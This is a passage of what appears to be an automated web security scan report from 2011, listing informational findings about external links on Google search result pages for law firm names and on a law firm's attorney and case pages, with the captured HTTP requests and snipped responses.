<h3 class="r"><a href="http://www.linkedin.com/company/hamilton-brook-smith-&amp;-reynolds-p.c." class=l onmousedown="return clk(this.href,'','','','10','','0CFcQFjAJ')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:WK3DLFO3BKEJ:www.linkedin.com/company/hamilton-brook-smith-%26-reynolds-p.c.+Hamilton+Brook+Smith+%26+Reynolds&amp;cd=10&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:WK3DLFO3BKEJ:www.linkedin.com/company/hamilton-brook-smith-%26-reynolds-p.c.+Hamilton+Brook+Smith+%26+Reynolds&cd=10&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','10','','0CFwQIDAJ')">Cached</a>
...[SNIP]...
<div><a href="http://www.foleyhoag.com/" class=l onmousedown="return clk(this.href,'','','','11','','0CF8QoggwCg')">Foley Hoag LLP</a>
...[SNIP]...
<div><a href="http://www.iandiorio.com/" class=l onmousedown="return clk(this.href,'','','','12','','0CGEQoggwCw')">Iandiorio & Teska</a>
...[SNIP]...
<div><a href="http://www.wolfgreenfield.com/" class=l onmousedown="return clk(this.href,'','','','13','','0CGMQoggwDA')">Wolf Greenfield</a>
...[SNIP]...
<div><a href="http://www.altmartlaw.com/" class=l onmousedown="return clk(this.href,'','','','14','','0CGUQoggwDQ')">Patent Law Massachusetts Attorney</a>
...[SNIP]...

19.54. http://www.google.com/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /search?q=Butler+Rubin+Saltarelli+%26+Boyd&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: PREF=ID=a84248b084119e14:U=0e01645f8124d18b:FF=0:TM=1297097718:LM=1297260472:S=nEXcDanFJNlg7e6-; NID=46=Kh16oMYjJ3i3M9ZKS5-Uc5ayK3FUI9_l7bNoXIqZCInKPUiI535abnnz71YLg2JxJAatb0xLnt91XRSe8ggj3yrqv3a9JAg-PawaBwsLEw2CfhkOasVNgrLJ9ixYklzJ

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:16:29 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 81031

<!doctype html> <head> <title>Butler Rubin Saltarelli &amp; Boyd - Google Search</title> <script>window.google={kEI:"nc_LTaXmKsHr0QHWr737Bg",kEXPI:"17259,23756,24692,24878,24879,27400,28164,285
...[SNIP]...
</div><a id=gb_36 href="http://www.youtube.com/results?q=Butler+Rubin+Saltarelli+%26+Boyd&oe=utf-8&rls=org.mozilla:en-US:official&client=firefox-a&um=1&ie=UTF-8&sa=N&hl=en&tab=w1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://www.butlerrubin.com/" class=l onmousedown="return clk(this.href,'','','','1','','0CBwQFjAA')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:ebrQrYdEB4IJ:www.butlerrubin.com/+Butler+Rubin+Saltarelli+%26+Boyd&amp;cd=1&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:ebrQrYdEB4IJ:www.butlerrubin.com/+Butler+Rubin+Saltarelli+%26+Boyd&cd=1&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','1','','0CCEQIDAA')">Cached</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.butlerrubin.com/web/br.nsf/attorneys" onmousedown="return clk(this.href,'','','','1','','0CCMQqwMoADAA')">Our people</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.butlerrubin.com/web/br.nsf/contact" onmousedown="return clk(this.href,'','','','1','','0CCQQqwMoATAA')">Contact us</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.butlerrubin.com/web/br.nsf/lateral_attorney_hiring" onmousedown="return clk(this.href,'','','','1','','0CCUQqwMoAjAA')">Lateral attorney hiring</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.butlerrubin.com/web/br.nsf/br_work" onmousedown="return clk(this.href,'','','','1','','0CCYQqwMoAzAA')">Working at butler rubin</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.butlerrubin.com/web/br.nsf/executivestaff" onmousedown="return clk(this.href,'','','','1','','0CCcQqwMoBDAA')">Executive staff</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.butlerrubin.com/web/br.nsf/client_service" onmousedown="return clk(this.href,'','','','1','','0CCgQqwMoBTAA')">Client Service</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.butlerrubin.com/web/br.nsf/diversity" onmousedown="return clk(this.href,'','','','1','','0CCkQqwMoBjAA')">Diversity</a></div><div class=sld><a class=sla href="http://www.butlerrubin.com/web/br.nsf/community_service" onmousedown="return clk(this.href,'','','','1','','0CCoQqwMoBzAA')">Our commitment</a>
...[SNIP]...
<h3 class="r"><a href="http://www.butlerrubin.com/web/br.nsf/executivestaff" class=l onmousedown="return clk(this.href,'','','','2','','0CC0QFjAB')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:2y_4oDCDL_EJ:www.butlerrubin.com/web/br.nsf/executivestaff+Butler+Rubin+Saltarelli+%26+Boyd&amp;cd=2&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:2y_4oDCDL_EJ:www.butlerrubin.com/web/br.nsf/executivestaff+Butler+Rubin+Saltarelli+%26+Boyd&cd=2&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','2','','0CDIQIDAB')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.butlerrubin.com/web/br.nsf/business_reorganization" class=l onmousedown="return clk(this.href,'','','','3','','0CDQQFjAC')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:CqE60lfUb_UJ:www.butlerrubin.com/web/br.nsf/business_reorganization+Butler+Rubin+Saltarelli+%26+Boyd&amp;cd=3&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:CqE60lfUb_UJ:www.butlerrubin.com/web/br.nsf/business_reorganization+Butler+Rubin+Saltarelli+%26+Boyd&cd=3&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','3','','0CDkQIDAC')">Cached</a>
...[SNIP]...
<span valign=top align=left style="padding:10;margin:0;width:24px;height:38px"><a href="http://www.butlerrubin.com/" class=l onmousedown="return clk(this.href,'','','','5','','0CEIQoAIwBA')" title="Butler Rubin Saltarelli &amp;amp; Boyd LLP" style="border:none;display:block;overflow:hidden;width:24px;height:38px"><span style="background:url('/images/red_icons_bg_A_J.png') no-repeat;background-position:0 -38px;display:block;height:38px;width:24px">
...[SNIP]...
<h4 class=r><a href="http://www.butlerrubin.com/" class=l onmousedown="return clk(this.href,'','','','5','','0CEIQoAIwBA')" title="Butler Rubin Saltarelli &amp;amp; Boyd LLP"><em>
...[SNIP]...
<span valign=top align=left style="padding:10;margin:0;width:24px;height:38px"><a href="http://www.butlerrubin.com/" class=l onmousedown="return clk(this.href,'','','','6','','0CEkQoAIwBQ')" title="Butler Rubin Saltarelli &amp;amp; Boyd: Bond R Douglass" style="border:none;display:block;overflow:hidden;width:24px;height:38px"><span style="background:url('/images/red_icons_bg_A_J.png') no-repeat;background-position:0 -76px;display:block;height:38px;width:24px">
...[SNIP]...
<h4 class=r><a href="http://www.butlerrubin.com/" class=l onmousedown="return clk(this.href,'','','','6','','0CEkQoAIwBQ')" title="Butler Rubin Saltarelli &amp;amp; Boyd: Bond R Douglass"><em>
...[SNIP]...
<h3 class="r"><a href="http://www.jdjournal.com/2010/08/09/butler-rubin-saltarelli-boyd-llp-hires-new-coo/" class=l onmousedown="return clk(this.href,'','','','7','','0CFMQFjAG')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:Gl6Zr6yLZycJ:www.jdjournal.com/2010/08/09/butler-rubin-saltarelli-boyd-llp-hires-new-coo/+Butler+Rubin+Saltarelli+%26+Boyd&amp;cd=7&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:Gl6Zr6yLZycJ:www.jdjournal.com/2010/08/09/butler-rubin-saltarelli-boyd-llp-hires-new-coo/+Butler+Rubin+Saltarelli+%26+Boyd&cd=7&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','7','','0CFgQIDAG')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.bestlawyers.com/firms/butler-rubin-saltarelli-boyd-llp/4278/US" class=l onmousedown="return clk(this.href,'','','','8','','0CFkQFjAH')">Best Lawyers - <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:uBsZ3t4zbdEJ:www.bestlawyers.com/firms/butler-rubin-saltarelli-boyd-llp/4278/US+Butler+Rubin+Saltarelli+%26+Boyd&amp;cd=8&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:uBsZ3t4zbdEJ:www.bestlawyers.com/firms/butler-rubin-saltarelli-boyd-llp/4278/US+Butler+Rubin+Saltarelli+%26+Boyd&cd=8&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','8','','0CF4QIDAH')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.linkedin.com/company/butler-rubin-saltarelli-&amp;-boyd" class=l onmousedown="return clk(this.href,'','','','9','','0CF8QFjAI')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:lMajwNrQlKIJ:www.linkedin.com/company/butler-rubin-saltarelli-%26-boyd+Butler+Rubin+Saltarelli+%26+Boyd&amp;cd=9&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:lMajwNrQlKIJ:www.linkedin.com/company/butler-rubin-saltarelli-%26-boyd+Butler+Rubin+Saltarelli+%26+Boyd&cd=9&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','9','','0CGQQIDAI')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.lawyers.com/Illinois/Chicago/Butler-Rubin-Saltarelli-and-Boyd-LLP-913924-f.html" class=l onmousedown="return clk(this.href,'','','','10','','0CGUQFjAJ')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:GznoZtMVhZ4J:www.lawyers.com/Illinois/Chicago/Butler-Rubin-Saltarelli-and-Boyd-LLP-913924-f.html+Butler+Rubin+Saltarelli+%26+Boyd&amp;cd=10&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:GznoZtMVhZ4J:www.lawyers.com/Illinois/Chicago/Butler-Rubin-Saltarelli-and-Boyd-LLP-913924-f.html+Butler+Rubin+Saltarelli+%26+Boyd&cd=10&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','10','','0CGwQIDAJ')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.martindale.com/Butler-Rubin-Saltarelli-Boyd-LLP/law-firm-756671.htm" class=l onmousedown="return clk(this.href,'','','','11','','0CG4QFjAK')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:hRJKLaPqU5MJ:www.martindale.com/Butler-Rubin-Saltarelli-Boyd-LLP/law-firm-756671.htm+Butler+Rubin+Saltarelli+%26+Boyd&amp;cd=11&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:hRJKLaPqU5MJ:www.martindale.com/Butler-Rubin-Saltarelli-Boyd-LLP/law-firm-756671.htm+Butler+Rubin+Saltarelli+%26+Boyd&cd=11&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','11','','0CHMQIDAK')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://chicago.citysearch.com/profile/38426856/chicago_il/bond_r_douglass_butler_rubin_saltarelli_boyd.html" class=l onmousedown="return clk(this.href,'','','','12','','0CHQQFjAL')">Bond, R Douglass - <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:SLJnUHXWGcUJ:chicago.citysearch.com/profile/38426856/chicago_il/bond_r_douglass_butler_rubin_saltarelli_boyd.html+Butler+Rubin+Saltarelli+%26+Boyd&amp;cd=12&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:SLJnUHXWGcUJ:chicago.citysearch.com/profile/38426856/chicago_il/bond_r_douglass_butler_rubin_saltarelli_boyd.html+Butler+Rubin+Saltarelli+%26+Boyd&cd=12&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','12','','0CHsQIDAL')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.infirmation.com/shared/lss/one-payscale.tcl?employer_id=IL0180" class=l onmousedown="return clk(this.href,'','','','13','','0CHwQFjAM')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:Ul5mXwUPl3UJ:www.infirmation.com/shared/lss/one-payscale.tcl%3Femployer_id%3DIL0180+Butler+Rubin+Saltarelli+%26+Boyd&amp;cd=13&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:Ul5mXwUPl3UJ:www.infirmation.com/shared/lss/one-payscale.tcl%3Femployer_id%3DIL0180+Butler+Rubin+Saltarelli+%26+Boyd&cd=13&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','13','','0CIEBECAwDA')">Cached</a>
...[SNIP]...
<div><a href="http://www.goldbergkohn.com/" class=l onmousedown="return clk(this.href,'','','','14','','0CIQBEKIIMA0')">Goldberg Kohn</a>
...[SNIP]...
<div><a href="http://www.jenner.com/" class=l onmousedown="return clk(this.href,'','','','15','','0CIYBEKIIMA4')">Jenner & Block LLP</a>
...[SNIP]...
<div><a href="http://www.greenandchesnut.com/" class=l onmousedown="return clk(this.href,'','','','16','','0CIgBEKIIMA8')">greenandchesnut</a>
...[SNIP]...
<div><a href="http://www.kieslerberman.com/" class=l onmousedown="return clk(this.href,'','','','17','','0CIoBEKIIMBA')">Kiesler & Berman Home</a>
...[SNIP]...

19.55. http://www.google.com/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /search?q=Pillsbury+Winthrop+Shaw+Pittman&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: PREF=ID=a84248b084119e14:U=0e01645f8124d18b:FF=0:TM=1297097718:LM=1297260472:S=nEXcDanFJNlg7e6-; NID=46=Kh16oMYjJ3i3M9ZKS5-Uc5ayK3FUI9_l7bNoXIqZCInKPUiI535abnnz71YLg2JxJAatb0xLnt91XRSe8ggj3yrqv3a9JAg-PawaBwsLEw2CfhkOasVNgrLJ9ixYklzJ

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:20:53 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 81450

<!doctype html> <head> <title>Pillsbury Winthrop Shaw Pittman - Google Search</title> <script>window.google={kEI:"pdDLTcPzLuf00gG0h4HLBg",kEXPI:"17259,23756,24692,24878,24879,27400,28164,28505,
...[SNIP]...
</div><a id=gb_36 href="http://www.youtube.com/results?q=Pillsbury+Winthrop+Shaw+Pittman&oe=utf-8&rls=org.mozilla:en-US:official&client=firefox-a&um=1&ie=UTF-8&sa=N&hl=en&tab=w1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://www.pillsburylaw.com/" class=l onmousedown="return clk(this.href,'','','','1','','0CCIQFjAA')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:nKA2-ruJEfgJ:www.pillsburylaw.com/+Pillsbury+Winthrop+Shaw+Pittman&amp;cd=1&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','1','','0CCcQIDAA')">Cached</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.pillsburylaw.com/index.cfm?pageID=13" onmousedown="return clk(this.href,'','','','1','','0CCkQqwMoADAA')">Professionals</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.pillsburylaw.com/index.cfm?pageID=3" onmousedown="return clk(this.href,'','','','1','','0CCoQqwMoATAA')">Offices</a></div><div class=sld><a class=sla href="http://www.pillsburylaw.com/index.cfm?pageID=80" onmousedown="return clk(this.href,'','','','1','','0CCsQqwMoAjAA')">Contact Us</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.pillsburylaw.com/index.cfm?pageID=11" onmousedown="return clk(this.href,'','','','1','','0CCwQqwMoAzAA')">Services</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.pillsburylaw.com/index.cfm?pageID=25" onmousedown="return clk(this.href,'','','','1','','0CC0QqwMoBDAA')">Publications &amp; Presentations</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.pillsburylaw.com/index.cfm?pageID=53" onmousedown="return clk(this.href,'','','','1','','0CC4QqwMoBTAA')">What Sets Us Apart</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.pillsburylaw.com/index.cfm?pageid=17" onmousedown="return clk(this.href,'','','','1','','0CC8QqwMoBjAA')">News</a></div><div class=sld><a class=sla href="http://www.pillsburylaw.com/index.cfm?pageid=5" onmousedown="return clk(this.href,'','','','1','','0CDAQqwMoBzAA')">Clients</a>
...[SNIP]...
<h3 class="r"><a href="http://www.pillsburylaw.com/index.cfm?pageID=13" class=l onmousedown="return clk(this.href,'','','','2','','0CDMQFjAB')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:xgmnj32n288J:www.pillsburylaw.com/index.cfm%3FpageID%3D13+Pillsbury+Winthrop+Shaw+Pittman&amp;cd=2&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:xgmnj32n288J:www.pillsburylaw.com/index.cfm%3FpageID%3D13+Pillsbury+Winthrop+Shaw+Pittman&cd=2&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','2','','0CDgQIDAB')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.pillsburylaw.com/index.cfm?pageID=3" class=l onmousedown="return clk(this.href,'','','','3','','0CDkQFjAC')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:VpEHI2MEjbYJ:www.pillsburylaw.com/index.cfm%3FpageID%3D3+Pillsbury+Winthrop+Shaw+Pittman&amp;cd=3&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:VpEHI2MEjbYJ:www.pillsburylaw.com/index.cfm%3FpageID%3D3+Pillsbury+Winthrop+Shaw+Pittman&cd=3&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','3','','0CEAQIDAC')">Cached</a>
...[SNIP]...
<span valign=top align=left style="padding:10;margin:0;width:24px;height:38px"><a href="http://www.pillsburylaw.com/" class=l onmousedown="return clk(this.href,'','','','4','','0CEMQoAIwAw')" title="Pillsbury Winthrop Shaw Llp: Plotz Thomas J" style="border:none;display:block;overflow:hidden;width:24px;height:38px"><span style="background:url('/images/red_icons_bg_A_J.png') no-repeat;background-position:0 0;display:block;height:38px;width:24px">
...[SNIP]...
<h4 class=r><a href="http://www.pillsburylaw.com/" class=l onmousedown="return clk(this.href,'','','','4','','0CEMQoAIwAw')" title="Pillsbury Winthrop Shaw Llp: Plotz Thomas J"><em>
...[SNIP]...
<span valign=top align=left style="padding:10;margin:0;width:24px;height:38px"><a href="http://www.pillsburylaw.com/" class=l onmousedown="return clk(this.href,'','','','6','','0CFEQoAIwBQ')" title="Pillsbury Winthrop Shaw Pittman" style="border:none;display:block;overflow:hidden;width:24px;height:38px"><span style="background:url('/images/red_icons_bg_A_J.png') no-repeat;background-position:0 -76px;display:block;height:38px;width:24px">
...[SNIP]...
<h4 class=r><a href="http://www.pillsburylaw.com/" class=l onmousedown="return clk(this.href,'','','','6','','0CFEQoAIwBQ')" title="Pillsbury Winthrop Shaw Pittman"><em>
...[SNIP]...
<h3 class="r"><a href="http://en.wikipedia.org/wiki/Pillsbury_Winthrop_Shaw_Pittman" class=l onmousedown="return clk(this.href,'','','','7','','0CFsQFjAG')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:vvtaQHosgIwJ:en.wikipedia.org/wiki/Pillsbury_Winthrop_Shaw_Pittman+Pillsbury+Winthrop+Shaw+Pittman&amp;cd=7&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','7','','0CGAQIDAG')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.linkedin.com/company/pillsbury-winthrop-shaw-pittman" class=l onmousedown="return clk(this.href,'','','','8','','0CGIQFjAH')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:AorIwNzxdOIJ:www.linkedin.com/company/pillsbury-winthrop-shaw-pittman+Pillsbury+Winthrop+Shaw+Pittman&amp;cd=8&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','8','','0CGcQIDAH')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.nndb.com/company/229/000124854/" class=l onmousedown="return clk(this.href,'','','','9','','0CGgQFjAI')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:jshOjtS_4LoJ:www.nndb.com/company/229/000124854/+Pillsbury+Winthrop+Shaw+Pittman&amp;cd=9&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','9','','0CG0QIDAI')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://investing.businessweek.com/research/stocks/snapshot/snapshot.asp?capId=1680186" class=l onmousedown="return clk(this.href,'','','','10','','0CG4QFjAJ')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:Zb0r0IZPdCAJ:investing.businessweek.com/research/stocks/snapshot/snapshot.asp%3FcapId%3D1680186+Pillsbury+Winthrop+Shaw+Pittman&amp;cd=10&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:Zb0r0IZPdCAJ:investing.businessweek.com/research/stocks/snapshot/snapshot.asp%3FcapId%3D1680186+Pillsbury+Winthrop+Shaw+Pittman&cd=10&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','10','','0CHMQIDAJ')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://pmstax.com/" class=l onmousedown="return clk(this.href,'','','','11','','0CHQQFjAK')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:LV9AgS4CwKMJ:pmstax.com/+Pillsbury+Winthrop+Shaw+Pittman&amp;cd=11&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','11','','0CHkQIDAK')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.workingmother.com/best-companies/pillsbury-winthrop-shaw-pittman-1" class=l onmousedown="return clk(this.href,'','','','12','','0CHsQFjAL')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:NWDLC2TmklcJ:www.workingmother.com/best-companies/pillsbury-winthrop-shaw-pittman-1+Pillsbury+Winthrop+Shaw+Pittman&amp;cd=12&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','12','','0CIABECAwCw')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://upcoming.yahoo.com/venue/11204/CA/Palo-Alto/Pillsbury-Winthrop-Shaw-Pittman-LLP" class=l onmousedown="return clk(this.href,'','','','13','','0CIEBEBYwDA')">Venue: <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:i7OHqk31etIJ:upcoming.yahoo.com/venue/11204/CA/Palo-Alto/Pillsbury-Winthrop-Shaw-Pittman-LLP+Pillsbury+Winthrop+Shaw+Pittman&amp;cd=13&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','13','','0CIYBECAwDA')">Cached</a>
...[SNIP]...
<div><a href="http://www.mofo.com/" class=l onmousedown="return clk(this.href,'','','','14','','0CIgBEKIIMA0')">Morrison & Foerster</a>
...[SNIP]...
<div><a href="http://www.proskauer.com/" class=l onmousedown="return clk(this.href,'','','','15','','0CIoBEKIIMA4')">Proskauer</a>
...[SNIP]...
<div><a href="http://www.morganlewis.com/" class=l onmousedown="return clk(this.href,'','','','16','','0CIwBEKIIMA8')">Morgan, Lewis & Bockius</a>
...[SNIP]...
<div><a href="http://www.cooley.com/" class=l onmousedown="return clk(this.href,'','','','17','','0CI4BEKIIMBA')">Cooley LLP</a>
...[SNIP]...

19.56. http://www.pomerantzlaw.com/attorneys.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pomerantzlaw.com
Path:   /attorneys.html

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /attorneys.html?action=attorneyDetail&attorneyID=24 HTTP/1.1
Host: www.pomerantzlaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pomerantzlaw.com/attorneys.html
Cookie: CFID=b0dfc93c%2D1d63%2D4672%2D97a7%2D5d72752495c2; CFTOKEN=0; __utma=182215078.918065188.1305200941.1305200941.1305200941.1; __utmb=182215078.3.10.1305200941; __utmc=182215078; __utmz=182215078.1305200941.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:49:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Railo-Version: 3.2.2.000
Content-Type: text/html; charset=UTF-8
Content-Length: 11747


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/ja
...[SNIP]...
</script><a href="http://www.addthis.com/bookmark.php" onmouseOver="return addthis_open(this, '', 'http://www.pomerantzlaw.com/attorneys.html?action=attorneyDetail&attorneyID=24', 'Cheryl D. Hamer')" onmouseOut="addthis_close()" onclick="return addthis_sendto()"><img src="http://s7.addthis.com/button1-share.gif" width="125" height="16" border="0" alt="Bookmark" /></a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...

19.57. http://www.pomerantzlaw.com/cases.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pomerantzlaw.com
Path:   /cases.html

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /cases.html?action=caseDetail&CaseID=102 HTTP/1.1
Host: www.pomerantzlaw.com
Proxy-Connection: keep-alive
